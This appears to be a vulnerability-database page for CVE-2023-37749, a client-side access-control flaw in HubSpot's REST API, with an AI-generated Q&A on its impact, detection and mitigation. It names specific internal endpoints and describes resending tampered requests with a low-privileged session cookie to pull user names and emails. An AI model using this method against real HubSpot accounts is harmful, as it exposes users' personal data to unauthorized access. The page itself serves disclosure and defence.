CVE-2023-37749
BaseFortify
Publication date: 2025-10-27
Last updated on: 2025-10-30
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| hubspot | hubspot | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2023-37749 is an Incorrect Access Control vulnerability in HubSpot's REST API endpoints. It allows unauthenticated or low-privileged attackers to access user data without proper authorization because access control is enforced only on the client side for some API endpoints instead of strictly on the server side. This means attackers can manipulate API requests to view sensitive user information such as names and emails that they should not have access to. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of user data, including names and emails, which increases risks such as targeted phishing attacks and user enumeration. Attackers with low privileges can exploit the flaw to access sensitive organizational user information, potentially compromising privacy and security within the affected HubSpot environment. [2, 1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by intercepting and analyzing REST API requests to HubSpot's internal endpoints, especially those related to user data such as /api/external-options/v2/pagedFetch and /api/app-users/v1/seat-purchase/downgrade-state. Detection involves capturing requests from low-privileged users and attempting to modify the request paths to access internal endpoints to see if unauthorized user data is returned. Commands or tools like curl or HTTP intercepting proxies (e.g., Burp Suite, OWASP ZAP) can be used to resend modified requests with the same session cookies to test for unauthorized data disclosure. For example, using curl to send a GET request to the vulnerable endpoint with a valid session cookie and altered parameters can help detect the issue. Additionally, monitoring logs for unexpected enumeration or access control failures on these endpoints can aid detection. [2, 1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include enforcing strict server-side authorization checks on the affected REST API endpoints such as /api/external-options/* and related internal endpoints to ensure that only authorized users can access sensitive user data. Limit the response data returned to non-privileged users following the principle of least privilege. Implement logging and alerting on unexpected enumeration or access control failure attempts. Additionally, apply rate limiting on API access to reduce automated attacks. If possible, update to a fixed version of HubSpot where the vendor has applied a server-side fix. Since the vulnerability arises from client-side enforcement of access control, shifting all access control enforcement to trusted server-side code is critical. Review and minimize CORS usage and properly configure it to prevent unauthorized API access. [2, 1]